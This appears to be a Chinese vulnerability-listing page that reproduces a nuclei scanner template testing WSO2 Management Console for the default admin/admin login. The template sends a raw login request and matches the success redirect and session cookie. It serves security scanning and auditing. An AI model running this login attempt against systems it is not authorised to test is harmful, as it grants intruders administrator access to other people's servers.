wso2-default-login: WSO2 Management Console Default Login

日期: 2025-08-01 | 影响软件: WSO2 | POC: 已公开

漏洞描述

WSO2 Management Console default admin credentials were discovered.

PoC代码[已公开]

id: wso2-default-login

info:
  name: WSO2 Management Console Default Login
  author: cocxanh
  severity: high
  description: WSO2 Management Console default admin credentials were discovered.
  reference:
    - https://docs.wso2.com/display/UES100/Accessing+the+Management+Console
    - https://is.docs.wso2.com/en/5.12.0/learn/multi-attribute-login/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cwe-id: CWE-522
  metadata:
    max-request: 1
  tags: default-login,wso2,vuln

http:
  - raw:
      - |
        POST /carbon/admin/login_action.jsp HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username={{username}}&password={{password}}

    payloads:
      username:
        - admin
      password:
        - admin
    attack: pitchfork
    redirects: false
    matchers:
      - type: word
        words:
          - "/carbon/admin/index.jsp?loginStatus=true"
          - "JSESSIONID"
        part: header
        condition: and
# digest: 490a0046304402204fcd5c24b4238b6f86f17d40215c13309cb51febf83ac1604581b5b5c0a3d44102200c368e2c6465303a2cbfa3dbbaa94d19a3846e9a5a913fa40b8101da4e9c179b:922c64590222798bb761d5b6d8e72950

来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/default-logins/wso2/wso2-default-login.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐